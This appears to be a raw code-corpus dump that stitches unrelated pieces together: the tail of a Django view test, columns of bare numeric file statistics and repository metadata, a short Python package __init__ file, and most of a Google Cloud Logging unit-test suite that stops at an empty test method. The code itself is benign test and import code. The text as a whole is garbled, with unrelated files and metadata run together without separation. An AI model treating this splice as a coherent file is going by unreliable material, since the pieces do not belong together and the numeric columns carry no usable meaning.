        self._assert_authed_list_ok(reverse('levelwise-ladder') + "testinglist_levelwise")

    def test_auth_check_userlists_view(self):
        url = reverse('userlist-edit', kwargs={'slug': "testinglist_levelwise"})
        self._assert_authed_list_ok(url)
| 44.338346
| 86
| 0.617433
| 723
| 5,897
| 4.86722
| 0.121715
| 0.035806
| 0.034101
| 0.040921
| 0.880648
| 0.870986
| 0.867008
| 0.822677
| 0.780619
| 0.780619
| 0
| 0.009675
| 0.263863
| 5,897
| 132
| 87
| 44.674242
| 0.800968
| 0.016279
| 0
| 0.781513
| 0
| 0
| 0.083118
| 0.018107
| 0
| 0
| 0
| 0
| 0.07563
| 1
| 0.07563
| false
| 0.042017
| 0.05042
| 0
| 0.134454
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
868edf50e44b6743ed4812d790093efba756e9a1
| 192
|
py
|
Python
|
ctsb/models/time_series/__init__.py
|
paula-gradu/ctsb
|
fdc00acb798949ce1120778ad4725faf170f80c3
|
[
"Apache-2.0"
] | 1
|
2021-07-03T05:26:56.000Z
|
2021-07-03T05:26:56.000Z
|
ctsb/models/time_series/__init__.py
|
paula-gradu/ctsb
|
fdc00acb798949ce1120778ad4725faf170f80c3
|
[
"Apache-2.0"
] | null | null | null |
ctsb/models/time_series/__init__.py
|
paula-gradu/ctsb
|
fdc00acb798949ce1120778ad4725faf170f80c3
|
[
"Apache-2.0"
] | null | null | null |
# time_series init file
from ctsb.models.time_series.linear import Linear
from ctsb.models.time_series.last_value import LastValue
from ctsb.models.time_series.predict_zero import PredictZero
| 38.4
| 60
| 0.864583
| 30
| 192
| 5.333333
| 0.5
| 0.25
| 0.2625
| 0.3375
| 0.45
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.083333
| 192
| 5
| 60
| 38.4
| 0.909091
| 0.109375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
8693306332f79fad53f192ec2b4080ec975f9ffa
| 43,533
|
py
|
Python
|
tests/unit/test_logger.py
|
ysde/python-logging
|
3ac637a76f6ee6800947de2508ec2c3193413bf0
|
[
"Apache-2.0"
] | null | null | null |
tests/unit/test_logger.py
|
ysde/python-logging
|
3ac637a76f6ee6800947de2508ec2c3193413bf0
|
[
"Apache-2.0"
] | null | null | null |
tests/unit/test_logger.py
|
ysde/python-logging
|
3ac637a76f6ee6800947de2508ec2c3193413bf0
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2016 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from copy import deepcopy
from datetime import datetime
from datetime import timedelta
from datetime import timezone
import unittest
import mock
def _make_credentials():
    """Return a Mock standing in for google.auth Credentials."""
    import google.auth.credentials

    credential_spec = google.auth.credentials.Credentials
    return mock.Mock(spec=credential_spec)
class TestLogger(unittest.TestCase):
PROJECT = "test-project"
LOGGER_NAME = "logger-name"
TIME_FORMAT = '"%Y-%m-%dT%H:%M:%S.%f%z"'
@staticmethod
def _get_target_class():
    """Return the class under test, imported lazily (PEP-style test helper)."""
    from google.cloud.logging import Logger

    return Logger
def _make_one(self, *args, **kw):
    """Instantiate the class under test, forwarding all arguments."""
    klass = self._get_target_class()
    return klass(*args, **kw)
def test_ctor_defaults(self):
    """Name + client alone yield derived project, paths, and no labels."""
    connection = object()
    fake_client = _Client(self.PROJECT, connection)
    logger = self._make_one(self.LOGGER_NAME, client=fake_client)
    expected_full = "projects/%s/logs/%s" % (self.PROJECT, self.LOGGER_NAME)
    self.assertEqual(logger.name, self.LOGGER_NAME)
    self.assertIs(logger.client, fake_client)
    self.assertEqual(logger.project, self.PROJECT)
    self.assertEqual(logger.full_name, expected_full)
    self.assertEqual(logger.path, "/" + expected_full)
    self.assertIsNone(logger.labels)
def test_ctor_explicit(self):
    """Labels passed to the constructor are stored verbatim."""
    explicit_labels = {"foo": "bar", "baz": "qux"}
    connection = object()
    fake_client = _Client(self.PROJECT, connection)
    logger = self._make_one(self.LOGGER_NAME, client=fake_client, labels=explicit_labels)
    expected_full = "projects/%s/logs/%s" % (self.PROJECT, self.LOGGER_NAME)
    self.assertEqual(logger.name, self.LOGGER_NAME)
    self.assertIs(logger.client, fake_client)
    self.assertEqual(logger.project, self.PROJECT)
    self.assertEqual(logger.full_name, expected_full)
    self.assertEqual(logger.path, "/" + expected_full)
    self.assertEqual(logger.labels, explicit_labels)
def test_batch_w_bound_client(self):
    """batch() with no argument reuses the logger's own client."""
    from google.cloud.logging import Batch

    bound_client = _Client(self.PROJECT, object())
    logger = self._make_one(self.LOGGER_NAME, client=bound_client)
    batch = logger.batch()
    self.assertIsInstance(batch, Batch)
    self.assertIs(batch.logger, logger)
    self.assertIs(batch.client, bound_client)
def test_batch_w_alternate_client(self):
    """batch(client=...) binds the batch to the explicit client, not the bound one."""
    from google.cloud.logging import Batch

    bound_client = _Client(self.PROJECT, object())
    alternate_client = _Client(self.PROJECT, object())
    logger = self._make_one(self.LOGGER_NAME, client=bound_client)
    batch = logger.batch(client=alternate_client)
    self.assertIsInstance(batch, Batch)
    self.assertIs(batch.logger, logger)
    self.assertIs(batch.client, alternate_client)
def test_log_empty_defaults_w_default_labels(self):
    """log_empty() with ctor labels writes one entry carrying those labels."""
    default_labels = {"foo": "spam"}
    expected_entry = {
        "logName": "projects/%s/logs/%s" % (self.PROJECT, self.LOGGER_NAME),
        "resource": {"type": "global", "labels": {}},
        "labels": default_labels,
    }
    client = _Client(self.PROJECT)
    api = client.logging_api = _DummyLoggingAPI()
    logger = self._make_one(self.LOGGER_NAME, client=client, labels=default_labels)
    logger.log_empty()
    self.assertEqual(api._write_entries_called_with, ([expected_entry], None, None, None))
def test_log_empty_w_explicit(self):
    """log_empty() forwards every explicit metadata field into the API entry,
    overriding the ctor defaults (labels, bound client)."""
    import datetime
    from google.cloud.logging import Resource

    ALT_LOG_NAME = "projects/foo/logs/alt.log.name"
    DEFAULT_LABELS = {"foo": "spam"}      # ctor labels, overridden per-call
    LABELS = {"foo": "bar", "baz": "qux"}
    IID = "IID"
    SEVERITY = "CRITICAL"
    METHOD = "POST"
    URI = "https://api.example.com/endpoint"
    STATUS = "500"
    TRACE = "12345678-1234-5678-1234-567812345678"
    SPANID = "000000000000004a"
    REQUEST = {"requestMethod": METHOD, "requestUrl": URI, "status": STATUS}
    TIMESTAMP = datetime.datetime(2016, 12, 31, 0, 1, 2, 999999)
    RESOURCE = Resource(
        type="gae_app", labels={"module_id": "default", "version_id": "test"}
    )
    # Expected serialized form of the single written entry.
    ENTRIES = [
        {
            "logName": ALT_LOG_NAME,
            "labels": LABELS,
            "insertId": IID,
            "severity": SEVERITY,
            "httpRequest": REQUEST,
            "timestamp": "2016-12-31T00:01:02.999999Z",
            "resource": RESOURCE._to_dict(),
            "trace": TRACE,
            "spanId": SPANID,
            "traceSampled": True,
        }
    ]
    client1 = _Client(self.PROJECT)
    client2 = _Client(self.PROJECT)   # alternate client that must be used
    api = client2.logging_api = _DummyLoggingAPI()
    logger = self._make_one(self.LOGGER_NAME, client=client1, labels=DEFAULT_LABELS)
    logger.log_empty(
        log_name=ALT_LOG_NAME,
        client=client2,
        labels=LABELS,
        insert_id=IID,
        severity=SEVERITY,
        http_request=REQUEST,
        timestamp=TIMESTAMP,
        resource=RESOURCE,
        trace=TRACE,
        span_id=SPANID,
        trace_sampled=True,
    )
    self.assertEqual(api._write_entries_called_with, (ENTRIES, None, None, None))
def test_log_text_defaults(self):
    """log_text() with no extras writes a bare textPayload entry."""
    payload = "TEXT"
    expected_entry = {
        "logName": "projects/%s/logs/%s" % (self.PROJECT, self.LOGGER_NAME),
        "textPayload": payload,
        "resource": {"type": "global", "labels": {}},
    }
    client = _Client(self.PROJECT)
    api = client.logging_api = _DummyLoggingAPI()
    logger = self._make_one(self.LOGGER_NAME, client=client)
    logger.log_text(payload)
    self.assertEqual(api._write_entries_called_with, ([expected_entry], None, None, None))
def test_log_text_w_unicode_and_default_labels(self):
    """log_text() carries the logger's default labels into the entry."""
    payload = "TEXT"
    default_labels = {"foo": "spam"}
    expected_entry = {
        "logName": "projects/%s/logs/%s" % (self.PROJECT, self.LOGGER_NAME),
        "textPayload": payload,
        "resource": {"type": "global", "labels": {}},
        "labels": default_labels,
    }
    client = _Client(self.PROJECT)
    api = client.logging_api = _DummyLoggingAPI()
    logger = self._make_one(self.LOGGER_NAME, client=client, labels=default_labels)
    logger.log_text(payload)
    self.assertEqual(api._write_entries_called_with, ([expected_entry], None, None, None))
def test_log_text_explicit(self):
    """log_text() forwards every explicit metadata field into the API entry,
    overriding the ctor defaults (labels, bound client)."""
    import datetime
    from google.cloud.logging import Resource

    ALT_LOG_NAME = "projects/foo/logs/alt.log.name"
    TEXT = "TEXT"
    DEFAULT_LABELS = {"foo": "spam"}      # ctor labels, overridden per-call
    LABELS = {"foo": "bar", "baz": "qux"}
    IID = "IID"
    SEVERITY = "CRITICAL"
    METHOD = "POST"
    URI = "https://api.example.com/endpoint"
    STATUS = "500"
    TRACE = "12345678-1234-5678-1234-567812345678"
    SPANID = "000000000000004a"
    REQUEST = {"requestMethod": METHOD, "requestUrl": URI, "status": STATUS}
    TIMESTAMP = datetime.datetime(2016, 12, 31, 0, 1, 2, 999999)
    RESOURCE = Resource(
        type="gae_app", labels={"module_id": "default", "version_id": "test"}
    )
    # Expected serialized form of the single written entry.
    ENTRIES = [
        {
            "logName": ALT_LOG_NAME,
            "textPayload": TEXT,
            "labels": LABELS,
            "insertId": IID,
            "severity": SEVERITY,
            "httpRequest": REQUEST,
            "timestamp": "2016-12-31T00:01:02.999999Z",
            "resource": RESOURCE._to_dict(),
            "trace": TRACE,
            "spanId": SPANID,
            "traceSampled": True,
        }
    ]
    client1 = _Client(self.PROJECT)
    client2 = _Client(self.PROJECT)   # alternate client that must be used
    api = client2.logging_api = _DummyLoggingAPI()
    logger = self._make_one(self.LOGGER_NAME, client=client1, labels=DEFAULT_LABELS)
    logger.log_text(
        TEXT,
        log_name=ALT_LOG_NAME,
        client=client2,
        labels=LABELS,
        insert_id=IID,
        severity=SEVERITY,
        http_request=REQUEST,
        timestamp=TIMESTAMP,
        resource=RESOURCE,
        trace=TRACE,
        span_id=SPANID,
        trace_sampled=True,
    )
    self.assertEqual(api._write_entries_called_with, (ENTRIES, None, None, None))
def test_log_struct_defaults(self):
    """log_struct with no options produces a bare jsonPayload entry."""
    payload = {"message": "MESSAGE", "weather": "cloudy"}
    expected_entries = [
        {
            "logName": f"projects/{self.PROJECT}/logs/{self.LOGGER_NAME}",
            "jsonPayload": payload,
            "resource": {"type": "global", "labels": {}},
        }
    ]
    client = _Client(self.PROJECT)
    api = client.logging_api = _DummyLoggingAPI()
    logger = self._make_one(self.LOGGER_NAME, client=client)

    logger.log_struct(payload)

    self.assertEqual(
        api._write_entries_called_with, (expected_entries, None, None, None)
    )
def test_log_struct_w_default_labels(self):
    """log_struct attaches the logger's default labels to the entry."""
    payload = {"message": "MESSAGE", "weather": "cloudy"}
    default_labels = {"foo": "spam"}
    expected_entries = [
        {
            "logName": f"projects/{self.PROJECT}/logs/{self.LOGGER_NAME}",
            "jsonPayload": payload,
            "resource": {"type": "global", "labels": {}},
            "labels": default_labels,
        }
    ]
    client = _Client(self.PROJECT)
    api = client.logging_api = _DummyLoggingAPI()
    logger = self._make_one(self.LOGGER_NAME, client=client, labels=default_labels)

    logger.log_struct(payload)

    self.assertEqual(
        api._write_entries_called_with, (expected_entries, None, None, None)
    )
def test_log_struct_w_explicit(self):
    """log_struct with every optional argument explicitly supplied.

    Mirrors test_log_text_explicit but for a jsonPayload: all metadata is
    serialized into the entry dict and the override ``client`` performs the
    write instead of the bound client.
    """
    import datetime

    from google.cloud.logging import Resource

    ALT_LOG_NAME = "projects/foo/logs/alt.log.name"
    STRUCT = {"message": "MESSAGE", "weather": "cloudy"}
    DEFAULT_LABELS = {"foo": "spam"}
    LABELS = {"foo": "bar", "baz": "qux"}
    IID = "IID"
    SEVERITY = "CRITICAL"
    METHOD = "POST"
    URI = "https://api.example.com/endpoint"
    STATUS = "500"
    TRACE = "12345678-1234-5678-1234-567812345678"
    SPANID = "000000000000004a"
    REQUEST = {"requestMethod": METHOD, "requestUrl": URI, "status": STATUS}
    TIMESTAMP = datetime.datetime(2016, 12, 31, 0, 1, 2, 999999)
    RESOURCE = Resource(
        type="gae_app", labels={"module_id": "default", "version_id": "test"}
    )
    # Expected REST payload: RFC3339 timestamp; explicit LABELS win over
    # the logger's DEFAULT_LABELS.
    ENTRIES = [
        {
            "logName": ALT_LOG_NAME,
            "jsonPayload": STRUCT,
            "labels": LABELS,
            "insertId": IID,
            "severity": SEVERITY,
            "httpRequest": REQUEST,
            "timestamp": "2016-12-31T00:01:02.999999Z",
            "resource": RESOURCE._to_dict(),
            "trace": TRACE,
            "spanId": SPANID,
            "traceSampled": True,
        }
    ]
    client1 = _Client(self.PROJECT)
    client2 = _Client(self.PROJECT)
    # API stub lives on client2 only: the override client must do the write.
    api = client2.logging_api = _DummyLoggingAPI()
    logger = self._make_one(self.LOGGER_NAME, client=client1, labels=DEFAULT_LABELS)
    logger.log_struct(
        STRUCT,
        log_name=ALT_LOG_NAME,
        client=client2,
        labels=LABELS,
        insert_id=IID,
        severity=SEVERITY,
        http_request=REQUEST,
        timestamp=TIMESTAMP,
        resource=RESOURCE,
        trace=TRACE,
        span_id=SPANID,
        trace_sampled=True,
    )
    self.assertEqual(api._write_entries_called_with, (ENTRIES, None, None, None))
def test_log_proto_defaults(self):
    """log_proto serializes the protobuf message into a protoPayload entry."""
    import json

    from google.protobuf.json_format import MessageToJson
    from google.protobuf.struct_pb2 import Struct, Value

    message = Struct(fields={"foo": Value(bool_value=True)})
    expected_entries = [
        {
            "logName": f"projects/{self.PROJECT}/logs/{self.LOGGER_NAME}",
            "protoPayload": json.loads(MessageToJson(message)),
            "resource": {"type": "global", "labels": {}},
        }
    ]
    client = _Client(self.PROJECT)
    api = client.logging_api = _DummyLoggingAPI()
    logger = self._make_one(self.LOGGER_NAME, client=client)

    logger.log_proto(message)

    self.assertEqual(
        api._write_entries_called_with, (expected_entries, None, None, None)
    )
def test_log_proto_w_default_labels(self):
    """log_proto attaches the logger's default labels to the proto entry."""
    import json

    from google.protobuf.json_format import MessageToJson
    from google.protobuf.struct_pb2 import Struct, Value

    message = Struct(fields={"foo": Value(bool_value=True)})
    default_labels = {"foo": "spam"}
    expected_entries = [
        {
            "logName": f"projects/{self.PROJECT}/logs/{self.LOGGER_NAME}",
            "protoPayload": json.loads(MessageToJson(message)),
            "resource": {"type": "global", "labels": {}},
            "labels": default_labels,
        }
    ]
    client = _Client(self.PROJECT)
    api = client.logging_api = _DummyLoggingAPI()
    logger = self._make_one(self.LOGGER_NAME, client=client, labels=default_labels)

    logger.log_proto(message)

    self.assertEqual(
        api._write_entries_called_with, (expected_entries, None, None, None)
    )
def test_log_proto_w_explicit(self):
    """log_proto with every optional argument explicitly supplied.

    Mirrors test_log_text_explicit but for a protoPayload: the message is
    serialized via MessageToJson, all metadata lands in the entry dict, and
    the override ``client`` performs the write.
    """
    import json
    import datetime

    from google.protobuf.json_format import MessageToJson
    from google.protobuf.struct_pb2 import Struct
    from google.protobuf.struct_pb2 import Value
    from google.cloud.logging import Resource

    message = Struct(fields={"foo": Value(bool_value=True)})
    ALT_LOG_NAME = "projects/foo/logs/alt.log.name"
    DEFAULT_LABELS = {"foo": "spam"}
    LABELS = {"foo": "bar", "baz": "qux"}
    IID = "IID"
    SEVERITY = "CRITICAL"
    METHOD = "POST"
    URI = "https://api.example.com/endpoint"
    STATUS = "500"
    TRACE = "12345678-1234-5678-1234-567812345678"
    SPANID = "000000000000004a"
    REQUEST = {"requestMethod": METHOD, "requestUrl": URI, "status": STATUS}
    TIMESTAMP = datetime.datetime(2016, 12, 31, 0, 1, 2, 999999)
    RESOURCE = Resource(
        type="gae_app", labels={"module_id": "default", "version_id": "test"}
    )
    # Expected REST payload: RFC3339 timestamp; explicit LABELS win over
    # the logger's DEFAULT_LABELS.
    ENTRIES = [
        {
            "logName": ALT_LOG_NAME,
            "protoPayload": json.loads(MessageToJson(message)),
            "labels": LABELS,
            "insertId": IID,
            "severity": SEVERITY,
            "httpRequest": REQUEST,
            "timestamp": "2016-12-31T00:01:02.999999Z",
            "resource": RESOURCE._to_dict(),
            "trace": TRACE,
            "spanId": SPANID,
            "traceSampled": True,
        }
    ]
    client1 = _Client(self.PROJECT)
    client2 = _Client(self.PROJECT)
    # API stub lives on client2 only: the override client must do the write.
    api = client2.logging_api = _DummyLoggingAPI()
    logger = self._make_one(self.LOGGER_NAME, client=client1, labels=DEFAULT_LABELS)
    logger.log_proto(
        message,
        log_name=ALT_LOG_NAME,
        client=client2,
        labels=LABELS,
        insert_id=IID,
        severity=SEVERITY,
        http_request=REQUEST,
        timestamp=TIMESTAMP,
        resource=RESOURCE,
        trace=TRACE,
        span_id=SPANID,
        trace_sampled=True,
    )
    self.assertEqual(api._write_entries_called_with, (ENTRIES, None, None, None))
def test_delete_w_bound_client(self):
    """delete() with no argument routes through the logger's bound client."""
    client = _Client(project=self.PROJECT)
    api = client.logging_api = _DummyLoggingAPI()
    logger = self._make_one(self.LOGGER_NAME, client=client)

    logger.delete()

    expected_name = f"projects/{self.PROJECT}/logs/{self.LOGGER_NAME}"
    self.assertEqual(api._logger_delete_called_with, expected_name)
def test_delete_w_alternate_client(self):
    """delete(client=...) routes through the override client, not the bound one."""
    client1 = _Client(project=self.PROJECT)
    client2 = _Client(project=self.PROJECT)
    api = client2.logging_api = _DummyLoggingAPI()
    logger = self._make_one(self.LOGGER_NAME, client=client1)

    logger.delete(client=client2)

    expected_name = f"projects/{self.PROJECT}/logs/{self.LOGGER_NAME}"
    self.assertEqual(api._logger_delete_called_with, expected_name)
def test_list_entries_defaults(self):
    """list_entries() with no arguments.

    Expects a POST to /entries:list scoped to the bound project, with a
    filter restricted to this logger plus an automatically-added
    ``timestamp>=`` clause roughly 24 hours in the past.
    """
    from google.cloud.logging import Client

    TOKEN = "TOKEN"
    client = Client(
        project=self.PROJECT, credentials=_make_credentials(), _use_grpc=False
    )
    returned = {"nextPageToken": TOKEN}
    client._connection = _Connection(returned)
    logger = self._make_one(self.LOGGER_NAME, client=client)
    iterator = logger.list_entries()
    page = next(iterator.pages)
    entries = list(page)
    token = iterator.next_page_token
    self.assertEqual(len(entries), 0)
    self.assertEqual(token, TOKEN)
    LOG_FILTER = "logName=projects/%s/logs/%s" % (self.PROJECT, self.LOGGER_NAME)
    # Check call payload.  The filter contains a dynamic timestamp, so
    # neutralize it before comparing the rest of the request body.
    call_payload_no_filter = deepcopy(client._connection._called_with)
    call_payload_no_filter["data"]["filter"] = "removed"
    self.assertEqual(
        call_payload_no_filter,
        {
            "path": "/entries:list",
            "method": "POST",
            "data": {
                "filter": "removed",
                "resourceNames": [f"projects/{self.PROJECT}"],
            },
        },
    )
    # Verify the auto-added default filter is ~24 hours: parse the timestamp
    # back out of the generated filter string (using the full filter as the
    # strptime format) and check it is within a minute of one day ago.
    timestamp = datetime.strptime(
        client._connection._called_with["data"]["filter"],
        LOG_FILTER + " AND timestamp>=" + self.TIME_FORMAT,
    )
    yesterday = datetime.now(timezone.utc) - timedelta(days=1)
    self.assertLess(yesterday - timestamp, timedelta(minutes=1))
def test_list_entries_explicit(self):
    """list_entries with explicit resource names, filter, ordering and paging.

    The user-supplied filter is combined with the logger-name filter, and a
    ``timestamp>=`` default clause is still appended because the input
    filter carries no timestamp of its own.
    """
    from google.cloud.logging import DESCENDING
    from google.cloud.logging import Client

    PROJECT1 = "PROJECT1"
    PROJECT2 = "PROJECT2"
    INPUT_FILTER = "resource.type:global"
    TOKEN = "TOKEN"
    PAGE_SIZE = 42
    client = Client(
        project=self.PROJECT, credentials=_make_credentials(), _use_grpc=False
    )
    client._connection = _Connection({})
    logger = self._make_one(self.LOGGER_NAME, client=client)
    iterator = logger.list_entries(
        resource_names=[f"projects/{PROJECT1}", f"projects/{PROJECT2}"],
        filter_=INPUT_FILTER,
        order_by=DESCENDING,
        page_size=PAGE_SIZE,
        page_token=TOKEN,
    )
    entries = list(iterator)
    token = iterator.next_page_token
    self.assertEqual(len(entries), 0)
    self.assertIsNone(token)
    # Check call payload; the dynamic timestamp in the filter is neutralized
    # before comparing the rest of the request body.
    call_payload_no_filter = deepcopy(client._connection._called_with)
    call_payload_no_filter["data"]["filter"] = "removed"
    self.assertEqual(
        call_payload_no_filter,
        {
            "method": "POST",
            "path": "/entries:list",
            "data": {
                "filter": "removed",
                "orderBy": DESCENDING,
                "pageSize": PAGE_SIZE,
                "pageToken": TOKEN,
                "resourceNames": [f"projects/{PROJECT1}", f"projects/{PROJECT2}"],
            },
        },
    )
    # Verify the auto-appended default timestamp filter is ~24 hours old:
    # parse it back out of the combined filter string.
    LOG_FILTER = "logName=projects/%s/logs/%s" % (self.PROJECT, self.LOGGER_NAME,)
    combined_filter = (
        INPUT_FILTER
        + " AND "
        + LOG_FILTER
        + " AND "
        + "timestamp>="
        + self.TIME_FORMAT
    )
    timestamp = datetime.strptime(
        client._connection._called_with["data"]["filter"], combined_filter
    )
    yesterday = datetime.now(timezone.utc) - timedelta(days=1)
    self.assertLess(yesterday - timestamp, timedelta(minutes=1))
def test_list_entries_explicit_timestamp(self):
    """list_entries with a filter that already contains a timestamp clause.

    When the user filter carries its own ``timestamp=`` clause, no default
    24-hour timestamp filter is appended, so the full request payload can be
    compared verbatim.
    """
    from google.cloud.logging import DESCENDING
    from google.cloud.logging import Client

    PROJECT1 = "PROJECT1"
    PROJECT2 = "PROJECT2"
    INPUT_FILTER = 'resource.type:global AND timestamp="2020-10-13T21"'
    TOKEN = "TOKEN"
    PAGE_SIZE = 42
    client = Client(
        project=self.PROJECT, credentials=_make_credentials(), _use_grpc=False
    )
    client._connection = _Connection({})
    logger = self._make_one(self.LOGGER_NAME, client=client)
    iterator = logger.list_entries(
        resource_names=[f"projects/{PROJECT1}", f"projects/{PROJECT2}"],
        filter_=INPUT_FILTER,
        order_by=DESCENDING,
        page_size=PAGE_SIZE,
        page_token=TOKEN,
    )
    entries = list(iterator)
    token = iterator.next_page_token
    self.assertEqual(len(entries), 0)
    self.assertIsNone(token)
    # Check call payload: only the logger-name filter is appended to the
    # user's filter (no default timestamp clause).
    LOG_FILTER = "logName=projects/%s/logs/%s" % (self.PROJECT, self.LOGGER_NAME,)
    combined_filter = INPUT_FILTER + " AND " + LOG_FILTER
    self.assertEqual(
        client._connection._called_with,
        {
            "method": "POST",
            "path": "/entries:list",
            "data": {
                "filter": combined_filter,
                "orderBy": DESCENDING,
                "pageSize": PAGE_SIZE,
                "pageToken": TOKEN,
                "resourceNames": [f"projects/{PROJECT1}", f"projects/{PROJECT2}"],
            },
        },
    )
class TestBatch(unittest.TestCase):
    """Unit tests for Batch: queuing log entries and committing them.

    Uses the module-level doubles (_Logger, _Client, _DummyLoggingAPI) to
    capture the arguments handed to the write_entries API call.
    """

    PROJECT = "test-project"

    @staticmethod
    def _get_target_class():
        # Imported lazily so import errors surface inside the test run.
        from google.cloud.logging import Batch

        return Batch

    def _make_one(self, *args, **kwargs):
        # Helper: instantiate the class under test.
        return self._get_target_class()(*args, **kwargs)

    def test_ctor_defaults(self):
        logger = _Logger()
        client = _Client(project=self.PROJECT)
        batch = self._make_one(logger, client)
        self.assertIs(batch.logger, logger)
        self.assertIs(batch.client, client)
        self.assertEqual(len(batch.entries), 0)

    def test_log_empty_defaults(self):
        # log_empty() queues a bare LogEntry without committing.
        from google.cloud.logging import LogEntry

        ENTRY = LogEntry()
        client = _Client(project=self.PROJECT, connection=_make_credentials())
        logger = _Logger()
        batch = self._make_one(logger, client=client)
        batch.log_empty()
        self.assertEqual(batch.entries, [ENTRY])

    def test_log_empty_explicit(self):
        # log_empty() with all metadata set queues an equivalent LogEntry.
        import datetime

        from google.cloud.logging import Resource
        from google.cloud.logging import LogEntry

        LABELS = {"foo": "bar", "baz": "qux"}
        IID = "IID"
        SEVERITY = "CRITICAL"
        METHOD = "POST"
        URI = "https://api.example.com/endpoint"
        STATUS = "500"
        REQUEST = {"requestMethod": METHOD, "requestUrl": URI, "status": STATUS}
        TIMESTAMP = datetime.datetime(2016, 12, 31, 0, 1, 2, 999999)
        RESOURCE = Resource(
            type="gae_app", labels={"module_id": "default", "version_id": "test"}
        )
        TRACE = "12345678-1234-5678-1234-567812345678"
        SPANID = "000000000000004a"
        ENTRY = LogEntry(
            labels=LABELS,
            insert_id=IID,
            severity=SEVERITY,
            http_request=REQUEST,
            timestamp=TIMESTAMP,
            resource=RESOURCE,
            trace=TRACE,
            span_id=SPANID,
            trace_sampled=True,
        )
        client = _Client(project=self.PROJECT, connection=_make_credentials())
        logger = _Logger()
        batch = self._make_one(logger, client=client)
        batch.log_empty(
            labels=LABELS,
            insert_id=IID,
            severity=SEVERITY,
            http_request=REQUEST,
            timestamp=TIMESTAMP,
            resource=RESOURCE,
            trace=TRACE,
            span_id=SPANID,
            trace_sampled=True,
        )
        self.assertEqual(batch.entries, [ENTRY])

    def test_log_text_defaults(self):
        from google.cloud.logging_v2.entries import _GLOBAL_RESOURCE
        from google.cloud.logging import TextEntry

        TEXT = "This is the entry text"
        ENTRY = TextEntry(payload=TEXT, resource=_GLOBAL_RESOURCE)
        client = _Client(project=self.PROJECT, connection=_make_credentials())
        logger = _Logger()
        batch = self._make_one(logger, client=client)
        batch.log_text(TEXT)
        self.assertEqual(batch.entries, [ENTRY])

    def test_log_text_explicit(self):
        # log_text() with all metadata queues an equivalent TextEntry.
        import datetime

        from google.cloud.logging import Resource
        from google.cloud.logging import TextEntry

        TEXT = "This is the entry text"
        LABELS = {"foo": "bar", "baz": "qux"}
        IID = "IID"
        SEVERITY = "CRITICAL"
        METHOD = "POST"
        URI = "https://api.example.com/endpoint"
        STATUS = "500"
        REQUEST = {"requestMethod": METHOD, "requestUrl": URI, "status": STATUS}
        TIMESTAMP = datetime.datetime(2016, 12, 31, 0, 1, 2, 999999)
        RESOURCE = Resource(
            type="gae_app", labels={"module_id": "default", "version_id": "test"}
        )
        TRACE = "12345678-1234-5678-1234-567812345678"
        SPANID = "000000000000004a"
        ENTRY = TextEntry(
            payload=TEXT,
            labels=LABELS,
            insert_id=IID,
            severity=SEVERITY,
            http_request=REQUEST,
            timestamp=TIMESTAMP,
            resource=RESOURCE,
            trace=TRACE,
            span_id=SPANID,
            trace_sampled=True,
        )
        client = _Client(project=self.PROJECT, connection=_make_credentials())
        logger = _Logger()
        batch = self._make_one(logger, client=client)
        batch.log_text(
            TEXT,
            labels=LABELS,
            insert_id=IID,
            severity=SEVERITY,
            http_request=REQUEST,
            timestamp=TIMESTAMP,
            resource=RESOURCE,
            trace=TRACE,
            span_id=SPANID,
            trace_sampled=True,
        )
        self.assertEqual(batch.entries, [ENTRY])

    def test_log_struct_defaults(self):
        from google.cloud.logging_v2.entries import _GLOBAL_RESOURCE
        from google.cloud.logging import StructEntry

        STRUCT = {"message": "Message text", "weather": "partly cloudy"}
        ENTRY = StructEntry(payload=STRUCT, resource=_GLOBAL_RESOURCE)
        client = _Client(project=self.PROJECT, connection=_make_credentials())
        logger = _Logger()
        batch = self._make_one(logger, client=client)
        batch.log_struct(STRUCT)
        self.assertEqual(batch.entries, [ENTRY])

    def test_log_struct_explicit(self):
        # log_struct() with all metadata queues an equivalent StructEntry.
        import datetime

        from google.cloud.logging import Resource
        from google.cloud.logging import StructEntry

        STRUCT = {"message": "Message text", "weather": "partly cloudy"}
        LABELS = {"foo": "bar", "baz": "qux"}
        IID = "IID"
        SEVERITY = "CRITICAL"
        METHOD = "POST"
        URI = "https://api.example.com/endpoint"
        STATUS = "500"
        TRACE = "12345678-1234-5678-1234-567812345678"
        SPANID = "000000000000004a"
        REQUEST = {"requestMethod": METHOD, "requestUrl": URI, "status": STATUS}
        TIMESTAMP = datetime.datetime(2016, 12, 31, 0, 1, 2, 999999)
        RESOURCE = Resource(
            type="gae_app", labels={"module_id": "default", "version_id": "test"}
        )
        ENTRY = StructEntry(
            payload=STRUCT,
            labels=LABELS,
            insert_id=IID,
            severity=SEVERITY,
            http_request=REQUEST,
            timestamp=TIMESTAMP,
            resource=RESOURCE,
            trace=TRACE,
            span_id=SPANID,
            trace_sampled=True,
        )
        client = _Client(project=self.PROJECT, connection=_make_credentials())
        logger = _Logger()
        batch = self._make_one(logger, client=client)
        batch.log_struct(
            STRUCT,
            labels=LABELS,
            insert_id=IID,
            severity=SEVERITY,
            http_request=REQUEST,
            timestamp=TIMESTAMP,
            resource=RESOURCE,
            trace=TRACE,
            span_id=SPANID,
            trace_sampled=True,
        )
        self.assertEqual(batch.entries, [ENTRY])

    def test_log_proto_defaults(self):
